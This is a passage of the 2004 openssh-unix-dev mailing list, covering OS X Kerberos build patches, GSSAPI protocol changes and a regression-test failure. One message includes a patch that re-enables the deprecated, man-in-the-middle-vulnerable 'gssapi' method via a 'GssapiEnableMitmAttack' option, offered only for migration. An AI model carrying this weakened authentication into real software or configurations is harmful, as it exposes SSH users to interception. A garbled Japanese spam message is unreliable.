From Sergio.Gelato at astro.su.se Mon Mar 1 00:27:00 2004 From: Sergio.Gelato at astro.su.se (Sergio Gelato) Date: Sun, 29 Feb 2004 14:27:00 +0100 Subject: OPenAFS and OpenSSH replacing kafs In-Reply-To: References: <20040228224005.GA5725@astro.su.se> Message-ID: <20040229132658.GA15093@astro.su.se> * Ben Lindstrom [2004-02-28 18:36:03 -0600]: > I have patches for OS/X to compile. I'll work on finalizing this because > some of this needs to go upstream (I plan on gutting the krb5_init_ets() > since it is a private API and is not needed on most systems). I need to > track down why extactly zlib.h hates being where it is, but this at least > is a workaround. The Kerberos framework includes which defines TARGET_OS_MAC, and /usr/include/zconv.h inexplicably suppresses the "typedef unsigned char Byte;" line in that case. Looks like a simple case of broken headers. For my builds I'll just copy zlib.h and zconv.h to the build directory, patch the copy of zconv.h and continue. Your solution of including zlib.h before krb5.h is probably also OK as a workaround. Your patches seem to be missing the SessionCreate() calls to the Security framework (the moral equivalent to setpag() I believe). Also, Michaud's patch was using the CCache API to manage the Kerberos credentials when linking against the Kerberos framework. That sort of detail could make the difference between "compiles" and "works". But we'll see; I'll try to find time to work on this on Monday. > > - Ben > > Index: auth-krb5.c > =================================================================== > RCS file: /var/cvs/openssh/auth-krb5.c,v > retrieving revision 1.21 > diff -u -r1.21 auth-krb5.c > --- auth-krb5.c 22 Nov 2003 01:11:06 -0000 1.21 > +++ auth-krb5.c 24 Feb 2004 07:13:56 -0000 > @@ -54,7 +54,9 @@ > problem = krb5_init_context(&authctxt->krb5_ctx); > if (problem) > return (problem); > +#ifndef __APPLE__ /* XXX OS/X claims to not need this */ > krb5_init_ets(authctxt->krb5_ctx); > +#endif > } > return (0); > } > Index: gss-serv-krb5.c > =================================================================== > RCS file: /var/cvs/openssh/gss-serv-krb5.c,v > retrieving revision 1.5 > diff -u -r1.5 gss-serv-krb5.c > --- gss-serv-krb5.c 23 Feb 2004 23:37:33 -0000 1.5 > +++ gss-serv-krb5.c 24 Feb 2004 07:13:59 -0000 > @@ -65,7 +65,9 @@ > logit("Cannot initialize krb5 context"); > return 0; > } > +#ifndef __APPLE__ /* Apple Claims OS/X does not need it */ > krb5_init_ets(krb_context); > +#endif > > return 1; > } > Index: monitor.c > =================================================================== > RCS file: /var/cvs/openssh/monitor.c,v > retrieving revision 1.64 > diff -u -r1.64 monitor.c > --- monitor.c 6 Feb 2004 05:40:27 -0000 1.64 > +++ monitor.c 24 Feb 2004 07:14:01 -0000 > @@ -33,11 +33,12 @@ > #include > #endif > > +#include "zlib.h" > + > #include "ssh.h" > #include "auth.h" > #include "kex.h" > #include "dh.h" > -#include "zlib.h" > #include "packet.h" > #include "auth-options.h" > #include "sshpty.h" > Index: monitor_wrap.c > =================================================================== > RCS file: /var/cvs/openssh/monitor_wrap.c,v > retrieving revision 1.40 > diff -u -r1.40 monitor_wrap.c > --- monitor_wrap.c 21 Nov 2003 12:56:47 -0000 1.40 > +++ monitor_wrap.c 24 Feb 2004 07:14:02 -0000 > @@ -30,6 +30,8 @@ > #include > #include > > +#include "zlib.h" > + > #include "ssh.h" > #include "dh.h" > #include "kex.h" > @@ -40,7 +42,6 @@ > #include "packet.h" > #include "mac.h" > #include "log.h" > -#include "zlib.h" > #include "monitor.h" > #include "monitor_wrap.h" > #include "xmalloc.h" > From djm at mindrot.org Mon Mar 1 10:41:32 2004 From: djm at mindrot.org (Damien Miller) Date: Mon, 1 Mar 2004 10:41:32 +1100 (EST) Subject: Change request For OpenSSH 3.8p1 In-Reply-To: <6120CD44-6A46-11D8-9F3D-0003934F6406@mac.com> References: <6120CD44-6A46-11D8-9F3D-0003934F6406@mac.com> Message-ID: I've been away from mail for a couple of days, so I am catching up on this rather amusing thread. On Sat, 28 Feb 2004, John Davidorff Pell wrote: > I'm not terribly interested in having threads or not having threads, it > was the This Will Never Happen Because I Say So And Am G-d attitude > that shocked me. It isn't because "I" say so - you are making incorrect assumptions. For instance, if I just did what I wanted, threads would have been removed by now (and probably a bit more too). I am quite sure that I speak for all the developers when I say that we don't want threads used in OpenSSH. -d From stuge-openssh-unix-dev at cdy.org Mon Mar 1 12:02:06 2004 From: stuge-openssh-unix-dev at cdy.org (Peter Stuge) Date: Mon, 1 Mar 2004 02:02:06 +0100 Subject: Change request For OpenSSH 3.8p1 In-Reply-To: <6120CD44-6A46-11D8-9F3D-0003934F6406@mac.com> References: <6120CD44-6A46-11D8-9F3D-0003934F6406@mac.com> Message-ID: <20040301010206.GD13984@foo.birdnet.se> On Sat, Feb 28, 2004 at 03:32:30PM -0800, John Davidorff Pell wrote: > no idea who he is. however, this being a Free Software package, I > expected this kind of decision not to be made by one person, or is > Damien the one we worship around here? It's been made by a whole bunch of very competent persons, some time ago. Long before your post. I'm sorry that you may have gotten the impression that OpenSSH is ruled by Damien, although I don't think too many would mind if it was, that isn't the case, it's just that he was the first one to respond to your question with the developer consensus. I'm also sorry you don't seem to mind getting tangled in threads, since it can really kill performance and security, which by the way happens to be two things I really appreciate in OpenSSH. I'll refrain from making a sarcastic Windows+threads=true comment now. Please trust that OpenSSH is a functional open source project, and if you doubt that it really is, spend some time to read up on the subject and comment on shortcomings with good background. Or even better, file a bug about the project in bugzilla! =) All the best to you and everyone else helping out in this great project! //Peter From kumaresh_ind at gmx.net Tue Mar 2 00:05:28 2004 From: kumaresh_ind at gmx.net (Kumaresh) Date: Mon, 1 Mar 2004 18:35:28 +0530 Subject: GSSAPI support in 3.8 ? Message-ID: <02e401c3ff8d$e6a76eb0$230110ac@kurco> Hi All, >From Changelog with 3.8: "The experimental "gssapi" support has been replaced with the "gssapi-with-mic" to fix possible MITM attacks.The two versions are not compatible." I am using OpenSSH-3.6 with Simon's patch and OpenSSH-3.7 built with GSSAPI support. The latest version OpenSSH-3.8 is not working with 3.6 or 3.7 with GSSAPI authentication. I have seen this in changelog, but my question is, can anybody explain briefly justifying this change in 3.8 and about MITM attacks? Because, I am afraid that in a large network that uses GSSAPI for authentication, the new OpenSSH has to be reinstalled on all the systems as the latest version is not compatible with older ones. Thanks, Kumar. --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004 From dtucker at zip.com.au Tue Mar 2 00:18:23 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Tue, 02 Mar 2004 00:18:23 +1100 Subject: GSSAPI support in 3.8 ? In-Reply-To: <02e401c3ff8d$e6a76eb0$230110ac@kurco> References: <02e401c3ff8d$e6a76eb0$230110ac@kurco> Message-ID: <4043381F.4010305@zip.com.au> Kumaresh wrote: >>From Changelog with 3.8: > "The experimental "gssapi" support has been replaced with the > "gssapi-with-mic" to fix possible MITM attacks.The two versions are not > compatible." > > I am using OpenSSH-3.6 with Simon's patch and OpenSSH-3.7 built with GSSAPI > support. The latest version OpenSSH-3.8 is not working with 3.6 or 3.7 with > GSSAPI authentication. I have seen this in changelog, but my question is, > can anybody explain briefly justifying this change in 3.8 and about MITM > attacks? I don't know much GSSAPI, but from what I recall it was because the draft protocol standard has changed: http://www.ietf.org/internet-drafts/draft-ietf-secsh-gsskeyex-07.txt [quote] 11. Changes the last version This section lists important changes since the previous version of this internet-draft. This section should be removed at the time of publication of this document as an RFC. o Changed "gssapi" to "gssapi-with-mic", and added the description and semantics of the SSH_MSG_USERAUTH_GSSAPI_MIC message. [/quote] > Because, I am afraid that in a large network that uses GSSAPI for > authentication, the new OpenSSH has to be reinstalled on all the systems as > the latest version is not compatible with older ones. I had heard that Simon was going to provide a patch for backward compatibility for one OpenSSH version. I'm not sure what the status of that is. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From mouring at etoh.eviladmin.org Tue Mar 2 08:25:08 2004 From: mouring at etoh.eviladmin.org (Ben Lindstrom) Date: Mon, 1 Mar 2004 15:25:08 -0600 (CST) Subject: OPenAFS and OpenSSH replacing kafs In-Reply-To: <20040229132658.GA15093@astro.su.se> Message-ID: On Sun, 29 Feb 2004, Sergio Gelato wrote: > * Ben Lindstrom [2004-02-28 18:36:03 -0600]: > > I have patches for OS/X to compile. I'll work on finalizing this because > > some of this needs to go upstream (I plan on gutting the krb5_init_ets() > > since it is a private API and is not needed on most systems). I need to > > track down why extactly zlib.h hates being where it is, but this at least > > is a workaround. > > The Kerberos framework includes which defines > TARGET_OS_MAC, and /usr/include/zconv.h inexplicably suppresses the > "typedef unsigned char Byte;" line in that case. Looks like a simple > case of broken headers. For my builds I'll just copy zlib.h and zconv.h > to the build directory, patch the copy of zconv.h and continue. Your > solution of including zlib.h before krb5.h is probably also OK as a > workaround. If this is a real bug in the headers. Then apple should be informed and they should correct the issue. > Your patches seem to be missing the SessionCreate() calls to the > Security framework (the moral equivalent to setpag() I believe). > Also, Michaud's patch was using the CCache API to manage the Kerberos > credentials when linking against the Kerberos framework. That sort of > detail could make the difference between "compiles" and "works". But > we'll see; I'll try to find time to work on this on Monday. > This is a separate issue. If you look at the Apple source code it is an optional patch for CCache API. Unless Apple has stripped out the other forms of fetching creditionals. I have no quarms importing CCache API if one is presented to me. Just not sure I liked the way Apple did it. But I only took a few moments glance at it. - Ben From Nicolas.Williams at sun.com Tue Mar 2 09:11:53 2004 From: Nicolas.Williams at sun.com (Nicolas Williams) Date: Mon, 1 Mar 2004 16:11:53 -0600 Subject: OPenAFS and OpenSSH replacing kafs Message-ID: <20040301221153.GZ10922@binky.central.sun.com> Markus asks: > if GSSAPI is the great generic security server API it claims > to be, then it can hide all this stuff from sshd. Correct, the GSS-API has gaps, such as: - There's no way to make delegated GSS credentials available for acquisition through GSS_Acquire_cred()/GSS_Add_cred(). See: http://www.ietf.org/internet-drafts/draft-williams-gssapi-store-deleg-creds-00.txt for a proposed solution which involves adding a function, GSS_Store_cred(), for storing gss_cred_id_t's in the "current" credentials store. Manipulation of credential stores is left as platform-specific, or for future extensions. The only objection I've had to this has been that GSS_Store_cred() does not seem to allow for per-session credential stores, however I do believe that PAM and GSS_Store_cred() could interact such that this is not an issue. This is the biggest gap in the GSS-API. - There's no way to inquire a mechanism for its "features." E.g., there's no way to know if a mechanism indicated by GSS_Indicate_mechs() is SPNEGO or otherwise negotiates mechanisms, which, as we know, must not be used in SSHv2. Note that authorization is not, however, an area where the GSS-API has gaps, but it is an area which may be handled differently on different platforms -- a consideration for portable code. Cheers, Nico -- From Sergio.Gelato at astro.su.se Tue Mar 2 11:27:37 2004 From: Sergio.Gelato at astro.su.se (Sergio Gelato) Date: Tue, 2 Mar 2004 01:27:37 +0100 Subject: OPenAFS and OpenSSH replacing kafs In-Reply-To: References: <20040229132658.GA15093@astro.su.se> Message-ID: <20040302002736.GA311@astro.su.se> * Ben Lindstrom [2004-03-01 15:25:08 -0600]: > If this is a real bug in the headers. Then apple should be informed and > they should correct the issue. I'll see about filing a bug report. However, it's a minor problem (easy to work around). > This is a separate issue. If you look at the Apple source code it is an > optional patch for CCache API. Unless Apple has stripped out the other > forms of fetching creditionals. There are actually two -D symbols, USE_CCAPI (which does little more than replacing FILE: with API: in the credentials cache specification) and USE_SECURITY_SESSION_API (which seems highly desirable, except on a standard 10.3 install where sshd is always started by xinetd; in the latter case xinetd already does the job and the corresponding code in sshd is idempotent). You are correct that the patches are optional, in the sense that sshd will work without them. klist seems to default to API: rather than FILE: when KRB5CCNAME doesn't specify the cache type, but that's a minor annoyance (and a hint that Apple prefers the API: cache type). ... I think I've found a bug in session.c: if (s->authctxt->krb5_ticket_file) child_set_env(&env, &envsize, "KRB5CCNAME", s->authctxt->krb5_ticket_file); should probably prefix an explicit "FILE:" to the value of s->authctxt->krb5_ticket_file. The GSSAPI code gets this right, but the Kerberos password code doesn't. Should we fix this in session.c or in auth-krb5.c ? On a different note, it seems that (as of version 71 of System.B) getaddrinfo() is still broken, in that it does not fail with EAI_NONAME when the AI_NUMERICHOST hint is given and the nodename is non-numeric. I'm getting erroneous "Nasty PTR record" warnings as a result, and I bet this also explains the tcp-wrappers configuration anomalies I've observed on 10.3. That's probably also worth a bug report to Apple. Will see if I can come up with an improved test for BROKEN_GETADDRINFO in configure.ac, one that does more than just look at the library version number. My top priority at the moment, though, is to sort out the MIC verification failures I'm having. (They appear to correlate with the client using Heimdal and the server MIT, so I'm smelling an interoperability issue between the two. Probably an already-known one.) From dtucker at zip.com.au Tue Mar 2 14:22:48 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Tue, 02 Mar 2004 14:22:48 +1100 Subject: OPenAFS and OpenSSH replacing kafs In-Reply-To: <20040302002736.GA311@astro.su.se> References: <20040229132658.GA15093@astro.su.se> <20040302002736.GA311@astro.su.se> Message-ID: <4043FE08.4060005@zip.com.au> Hi. Sergio Gelato wrote: > Will see if I can > come up with an improved test for BROKEN_GETADDRINFO in configure.ac, > one that does more than just look at the library version number. I have a cruddy stand-alone program that emulates most of what sshd does during the name/address lookups and bind() (while spitting out debugging). If could probably be turned into a usable test program by just deleting lines. If it's of any use to you, you're welcome to it: http://www.zip.com.au/~dtucker/openssh/getaddrinfotest.c -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From sunfaina-web at yahoo.co.jp Tue Mar 2 14:51:07 2004 From: sunfaina-web at yahoo.co.jp (=?ISO-2022-JP?B?GyRCJTUlcyVVJSElJCVKJXMlORsoQg==?=) Date: Tue, 2 Mar 2004 14:51:07 +1100 (EST) Subject: =?iso-2022-jp?b?GyRCJDRNOztxJE4kNDBGRmIbKEI=?= Message-ID: <20040302035107.959B327C187@shitei.mindrot.org> ???T???t?@?C?i???X?????B ?S???????X?s?[?h?Z???B ?????s?m???F?????????????????Z?????B ??????HP???????????????B http://ad3-9.e-city.tv From couannette at free.fr Tue Mar 2 21:56:06 2004 From: couannette at free.fr (Couannette) Date: Tue, 02 Mar 2004 11:56:06 +0100 Subject: openssh 3.8p1 on Linux Message-ID: <40446846.8080508@free.fr> Hello, I'm having trouble with OpenSSH on Linux. Here is attached the regression tests log - it'll explain what my problems are. This cause sshd to die with this output: buffer_get: trying to get more bytes 1 than in buffer 0 ssh would also dies with this message. I recreated my user keys, and it works now. remote sshd is 3.7.1p2. But sshd won't start even after recreating server keys. Even after recreating moduli file as explained in man ssh-keygen. I'm running Lunar Linux (source based distro), with kernel 2.4.24, glibc 2.3.2, gcc 3.2.3. I have an AMD uP. I tried to debug sshd with gdb but I can't find any clue at this stage. strace tells me that sshd, after opening /etc/ssh/ssh_host_key calls read with size=0 ( read(3, "", 0) = 0 ). That sounds weird, isn't it ? Please help, thank you in advance, Couannette Log: root at bubus /usr/src/openssh-3.8p1 # make tests (cd openbsd-compat && make) make[1]: Entering directory `/usr/src/openssh-3.8p1/openbsd-compat' make[1]: Nothing to be done for `all'. make[1]: Leaving directory `/usr/src/openssh-3.8p1/openbsd-compat' BUILDDIR=`pwd`; \ [ -d `pwd`/regress ] || mkdir -p `pwd`/regress; \ [ -f `pwd`/regress/Makefile ] || \ ln -s ./regress/Makefile `pwd`/regress/Makefile ; \ TEST_SHELL="/bin/bash"; \ TEST_SSH_SSH="${BUILDDIR}/ssh"; \ TEST_SSH_SSHD="${BUILDDIR}/sshd"; \ TEST_SSH_SSHAGENT="${BUILDDIR}/ssh-agent"; \ TEST_SSH_SSHADD="${BUILDDIR}/ssh-add"; \ TEST_SSH_SSHKEYGEN="${BUILDDIR}/ssh-keygen"; \ TEST_SSH_SSHKEYSCAN="${BUILDDIR}/ssh-keyscan"; \ TEST_SSH_SFTP="${BUILDDIR}/sftp"; \ TEST_SSH_SFTPSERVER="${BUILDDIR}/sftp-server"; \ cd ./regress || exit $?; \ make \ .OBJDIR="${BUILDDIR}/regress" \ .CURDIR="`pwd`" \ BUILDDIR="${BUILDDIR}" \ OBJ="${BUILDDIR}/regress/" \ PATH="${BUILDDIR}:${PATH}" \ TEST_SHELL="${TEST_SHELL}" \ TEST_SSH_SSH="${TEST_SSH_SSH}" \ TEST_SSH_SSHD="${TEST_SSH_SSHD}" \ TEST_SSH_SSHAGENT="${TEST_SSH_SSHAGENT}" \ TEST_SSH_SSHADD="${TEST_SSH_SSHADD}" \ TEST_SSH_SSHKEYGEN="${TEST_SSH_SSHKEYGEN}" \ TEST_SSH_SSHKEYSCAN="${TEST_SSH_SSHKEYSCAN}" \ TEST_SSH_SFTP="${TEST_SSH_SFTP}" \ TEST_SSH_SFTPSERVER="${TEST_SSH_SFTPSERVER}" \ EXEEXT="" \ tests make[1]: Entering directory `/usr/src/openssh-3.8p1/regress' ssh-keygen -if /usr/src/openssh-3.8p1/regress/rsa_ssh2.prv | diff - /usr/src/openssh-3.8p1/regress/rsa_openssh.prv cat /usr/src/openssh-3.8p1/regress/rsa_openssh.prv > /usr/src/openssh-3.8p1/regress//t2.out chmod 600 /usr/src/openssh-3.8p1/regress//t2.out ssh-keygen -yf /usr/src/openssh-3.8p1/regress//t2.out | diff - /usr/src/openssh-3.8p1/regress/rsa_openssh.pub buffer_get: trying to get more bytes 1 than in buffer 0 0a1 > ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDsilwKcaKN6wSMNd1WgQ9+HRqQEkD0kCTVttrazGu0OhBU3Uko+dFD1Ip0CxdXmN25JQWxOYF7h/Ocu8P3jzv3RTX87xKR0YzlXTLX+SLtF/ySebS3xWPrlfRUDhh03hR5V+8xxvvy9widPYKw/oItwGSueOsEq1LTczCDv2dAjQ== make[1]: *** [t2] Error 1 make[1]: Leaving directory `/usr/src/openssh-3.8p1/regress' make: *** [tests] Error 2 root at bubus /usr/src/openssh-3.8p1 # excerpt of sshd strace ouput: open("/etc/ssh/sshd_config", O_RDONLY|O_LARGEFILE) = 3 fstat64(3, {st_mode=S_IFREG|0600, st_size=2425, ...}) = 0 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 read(3, "#\t$OpenBSD: sshd_config,v 1.59 2"..., 4096) = 2425 read(3, "", 4096) = 0 close(3) = 0 munmap(0x40017000, 4096) = 0 open("/etc/ssh/ssh_host_key", O_RDONLY|O_LARGEFILE) = 3 fstat64(3, {st_mode=S_IFREG|0600, st_size=525, ...}) = 0 getuid32() = 0 fstat64(3, {st_mode=S_IFREG|0600, st_size=525, ...}) = 0 brk(0) = 0x809a000 brk(0x809b000) = 0x809b000 read(3, "", 0) = 0 write(2, "buffer_get: trying to get more b"..., 57buffer_get: trying to get more bytes 1 than in buffer 0 ) = 57 exit_group(255) = ? From djm at mindrot.org Tue Mar 2 22:05:12 2004 From: djm at mindrot.org (Damien Miller) Date: Tue, 2 Mar 2004 22:05:12 +1100 (EST) Subject: openssh 3.8p1 on Linux In-Reply-To: <40446846.8080508@free.fr> References: <40446846.8080508@free.fr> Message-ID: On Tue, 2 Mar 2004, Couannette wrote: > Hello, > > I'm having trouble with OpenSSH on Linux. > Here is attached the regression tests log - it'll explain what my > problems are. This cause sshd to die with this output: > > buffer_get: trying to get more bytes 1 than in buffer 0 Please send server debug output "sshd -ddd", an error without context isn't much help... -d From deengert at anl.gov Wed Mar 3 00:10:44 2004 From: deengert at anl.gov (Douglas E. Engert) Date: Tue, 02 Mar 2004 07:10:44 -0600 Subject: OPenAFS and OpenSSH replacing kafs References: <20040301221153.GZ10922@binky.central.sun.com> Message-ID: <404487D4.8C986DC1@anl.gov> Nicolas Williams wrote: > > Markus asks: > > > if GSSAPI is the great generic security server API it claims > > to be, then it can hide all this stuff from sshd. > > Correct, the GSS-API has gaps, such as: > > - There's no way to make delegated GSS credentials available for > acquisition through GSS_Acquire_cred()/GSS_Add_cred(). > > See: > > http://www.ietf.org/internet-drafts/draft-williams-gssapi-store-deleg-creds-00.txt Also see: http://www.ietf.org/internet-drafts/draft-engert-ggf-gss-extensions-00.txt which defines a gss_export_cred which handles exporting of the delegated cred, and includes gss_inquire_sec_context_by_oid call and gss_inquire_cred_by_oid to address your inquiry problems. This draft was produced by the Global Grid Forum http://www.ggf.org > > for a proposed solution which involves adding a function, > GSS_Store_cred(), for storing gss_cred_id_t's in the "current" > credentials store. Manipulation of credential stores is left as > platform-specific, or for future extensions. > > The only objection I've had to this has been that GSS_Store_cred() > does not seem to allow for per-session credential stores, however I > do believe that PAM and GSS_Store_cred() could interact such that > this is not an issue. > > This is the biggest gap in the GSS-API. > > - There's no way to inquire a mechanism for its "features." E.g., > there's no way to know if a mechanism indicated by > GSS_Indicate_mechs() is SPNEGO or otherwise negotiates mechanisms, > which, as we know, must not be used in SSHv2. > > Note that authorization is not, however, an area where the GSS-API has > gaps, but it is an area which may be handled differently on different > platforms -- a consideration for portable code. > > Cheers, > > Nico > -- > > _______________________________________________ > openssh-unix-dev mailing list > openssh-unix-dev at mindrot.org > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev -- Douglas E. Engert Argonne National Laboratory 9700 South Cass Avenue Argonne, Illinois 60439 (630) 252-5444 From sxw at inf.ed.ac.uk Wed Mar 3 08:15:26 2004 From: sxw at inf.ed.ac.uk (sxw at inf.ed.ac.uk) Date: Tue, 2 Mar 2004 21:15:26 +0000 (GMT) Subject: GSSAPI support in 3.8 ? In-Reply-To: <4043381F.4010305@zip.com.au> Message-ID: On Tue, 2 Mar 2004, Darren Tucker wrote: > I don't know much GSSAPI, but from what I recall it was because the > draft protocol standard has changed: The protocol was changed because of concerns that it didn't tie the SSH session ID with the context established through GSSAPI. It was felt that this didn't provide sufficient protection against certain active man-in-the-middle attacks. > > Because, I am afraid that in a large network that uses GSSAPI for > > authentication, the new OpenSSH has to be reinstalled on all the systems as > > the latest version is not compatible with older ones. > > I had heard that Simon was going to provide a patch for backward > compatibility for one OpenSSH version. I'm not sure what the status of > that is. I've now completed testing some minimal patches for backwards compatibility. They're attached to this email. Please note that these patches are made available purely for the purpose of simplifying the migration path - new users should have no need for them. Instructions for their use are at the beginning of the patch. Cheers, Simon. -------------- next part -------------- The patch below adds support for the deprecated 'gssapi' authentication mechanism to OpenSSH 3.8p1. The newer 'gssapi-with-mic' mechanism is included in this release. The use of 'gssapi' is deprecated due to the presence of potential man-in-the-middle attacks, which 'gssapi-with-mic' is not susceptible to. To use the patch apply it to a OpenSSH 3.8p1 source tree. After compiling, backwards compatibility may be obtained by supplying the 'GssapiEnableMitmAttack yes' option to either the client or server. It should be noted that this patch is being made available purely as a means of easing the process of moving to OpenSSH 3.8p1. Any new installations are recommended to use the 'gssapi-with-mic' mechanism. Existing installations are encouraged to upgrade as soon as possible. Index: auth2-gss.c =================================================================== RCS file: /cvs/openssh/auth2-gss.c,v retrieving revision 1.8 diff -u -r1.8 auth2-gss.c --- auth2-gss.c 21 Nov 2003 12:56:47 -0000 1.8 +++ auth2-gss.c 2 Mar 2004 20:47:28 -0000 @@ -171,6 +171,15 @@ dispatch_set( SSH2_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE, &input_gssapi_exchange_complete); + + /* + * Old style 'gssapi' didn't have the GSSAPI_MIC + * and went straight to sending exchange_complete + */ + if (options.gss_enable_mitm) + dispatch_set( + SSH2_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE, + &input_gssapi_exchange_complete); } } @@ -290,6 +299,12 @@ "gssapi-with-mic", userauth_gssapi, &options.gss_authentication +}; + +Authmethod method_gssapi_old = { + "gssapi", + userauth_gssapi, + &options.gss_enable_mitm }; #endif /* GSSAPI */ Index: auth2.c =================================================================== RCS file: /cvs/openssh/auth2.c,v retrieving revision 1.126 diff -u -r1.126 auth2.c --- auth2.c 17 Nov 2003 10:13:41 -0000 1.126 +++ auth2.c 2 Mar 2004 20:47:28 -0000 @@ -54,6 +54,7 @@ extern Authmethod method_hostbased; #ifdef GSSAPI extern Authmethod method_gssapi; +extern Authmethod method_gssapi_old; #endif Authmethod *authmethods[] = { @@ -61,6 +62,7 @@ &method_pubkey, #ifdef GSSAPI &method_gssapi, + &method_gssapi_old, #endif &method_passwd, &method_kbdint, Index: readconf.c =================================================================== RCS file: /cvs/openssh/readconf.c,v retrieving revision 1.102 diff -u -r1.102 readconf.c --- readconf.c 17 Dec 2003 05:33:11 -0000 1.102 +++ readconf.c 2 Mar 2004 20:47:28 -0000 @@ -104,7 +104,7 @@ oHostKeyAlgorithms, oBindAddress, oSmartcardDevice, oClearAllForwardings, oNoHostAuthenticationForLocalhost, oEnableSSHKeysign, oRekeyLimit, oVerifyHostKeyDNS, oConnectTimeout, - oAddressFamily, oGssAuthentication, oGssDelegateCreds, + oAddressFamily, oGssAuthentication, oGssDelegateCreds, oGssEnableMITM, oServerAliveInterval, oServerAliveCountMax, oDeprecated, oUnsupported } OpCodes; @@ -139,9 +139,11 @@ #if defined(GSSAPI) { "gssapiauthentication", oGssAuthentication }, { "gssapidelegatecredentials", oGssDelegateCreds }, + { "gssapienablemitmattack", oGssEnableMITM }, #else { "gssapiauthentication", oUnsupported }, { "gssapidelegatecredentials", oUnsupported }, + { "gssapienablemitmattack", oUnsupported }, #endif { "fallbacktorsh", oDeprecated }, { "usersh", oDeprecated }, @@ -394,6 +396,10 @@ case oGssDelegateCreds: intptr = &options->gss_deleg_creds; goto parse_flag; + + case oGssEnableMITM: + intptr = &options->gss_enable_mitm; + goto parse_flag; case oBatchMode: intptr = &options->batch_mode; @@ -829,6 +835,7 @@ options->challenge_response_authentication = -1; options->gss_authentication = -1; options->gss_deleg_creds = -1; + options->gss_enable_mitm = -1; options->password_authentication = -1; options->kbd_interactive_authentication = -1; options->kbd_interactive_devices = NULL; @@ -907,6 +914,8 @@ options->gss_authentication = 0; if (options->gss_deleg_creds == -1) options->gss_deleg_creds = 0; + if (options->gss_enable_mitm == -1) + options->gss_enable_mitm = 0; if (options->password_authentication == -1) options->password_authentication = 1; if (options->kbd_interactive_authentication == -1) Index: readconf.h =================================================================== RCS file: /cvs/openssh/readconf.h,v retrieving revision 1.51 diff -u -r1.51 readconf.h --- readconf.h 17 Dec 2003 05:33:11 -0000 1.51 +++ readconf.h 2 Mar 2004 20:47:28 -0000 @@ -43,6 +43,7 @@ /* Try S/Key or TIS, authentication. */ int gss_authentication; /* Try GSS authentication */ int gss_deleg_creds; /* Delegate GSS credentials */ + int gss_enable_mitm; /* Enable old style gssapi auth */ int password_authentication; /* Try password * authentication. */ int kbd_interactive_authentication; /* Try keyboard-interactive auth. */ Index: servconf.c =================================================================== RCS file: /cvs/openssh/servconf.c,v retrieving revision 1.120 diff -u -r1.120 servconf.c --- servconf.c 23 Jan 2004 11:03:10 -0000 1.120 +++ servconf.c 2 Mar 2004 20:47:28 -0000 @@ -75,6 +75,7 @@ options->kerberos_get_afs_token = -1; options->gss_authentication=-1; options->gss_cleanup_creds = -1; + options->gss_enable_mitm = -1; options->password_authentication = -1; options->kbd_interactive_authentication = -1; options->challenge_response_authentication = -1; @@ -188,6 +189,8 @@ options->gss_authentication = 0; if (options->gss_cleanup_creds == -1) options->gss_cleanup_creds = 1; + if (options->gss_enable_mitm == -1) + options->gss_enable_mitm = 0; if (options->password_authentication == -1) options->password_authentication = 1; if (options->kbd_interactive_authentication == -1) @@ -266,7 +269,7 @@ sBanner, sUseDNS, sHostbasedAuthentication, sHostbasedUsesNameFromPacketOnly, sClientAliveInterval, sClientAliveCountMax, sAuthorizedKeysFile, sAuthorizedKeysFile2, - sGssAuthentication, sGssCleanupCreds, + sGssAuthentication, sGssCleanupCreds, sGssEnableMITM, sUsePrivilegeSeparation, sDeprecated, sUnsupported } ServerOpCodes; @@ -321,9 +324,11 @@ #ifdef GSSAPI { "gssapiauthentication", sGssAuthentication }, { "gssapicleanupcredentials", sGssCleanupCreds }, + { "gssapienablemitmattack", sGssEnableMITM }, #else { "gssapiauthentication", sUnsupported }, { "gssapicleanupcredentials", sUnsupported }, + { "gssapienablemitmattack", sUnsupported }, #endif { "passwordauthentication", sPasswordAuthentication }, { "kbdinteractiveauthentication", sKbdInteractiveAuthentication }, @@ -650,6 +655,10 @@ case sGssCleanupCreds: intptr = &options->gss_cleanup_creds; + goto parse_flag; + + case sGssEnableMITM: + intptr = &options->gss_enable_mitm; goto parse_flag; case sPasswordAuthentication: Index: servconf.h =================================================================== RCS file: /cvs/openssh/servconf.h,v retrieving revision 1.59 diff -u -r1.59 servconf.h --- servconf.h 31 Dec 2003 00:37:34 -0000 1.59 +++ servconf.h 2 Mar 2004 20:47:28 -0000 @@ -84,6 +84,7 @@ * authenticated with Kerberos. */ int gss_authentication; /* If true, permit GSSAPI authentication */ int gss_cleanup_creds; /* If true, destroy cred cache on logout */ + int gss_enable_mitm; /* If true, enable old style GSSAPI */ int password_authentication; /* If true, permit password * authentication. */ int kbd_interactive_authentication; /* If true, permit */ Index: sshconnect2.c =================================================================== RCS file: /cvs/openssh/sshconnect2.c,v retrieving revision 1.123 diff -u -r1.123 sshconnect2.c --- sshconnect2.c 21 Jan 2004 00:02:50 -0000 1.123 +++ sshconnect2.c 2 Mar 2004 20:47:28 -0000 @@ -226,6 +226,10 @@ userauth_gssapi, &options.gss_authentication, NULL}, + {"gssapi", + userauth_gssapi, + &options.gss_enable_mitm, + NULL}, #endif {"hostbased", userauth_hostbased, @@ -563,7 +567,9 @@ if (status == GSS_S_COMPLETE) { /* send either complete or MIC, depending on mechanism */ - if (!(flags & GSS_C_INTEG_FLAG)) { + + if (strcmp(authctxt->method->name,"gssapi")==0 || + (!(flags & GSS_C_INTEG_FLAG))) { packet_start(SSH2_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE); packet_send(); } else { From rac at tenzing.org Wed Mar 3 08:29:33 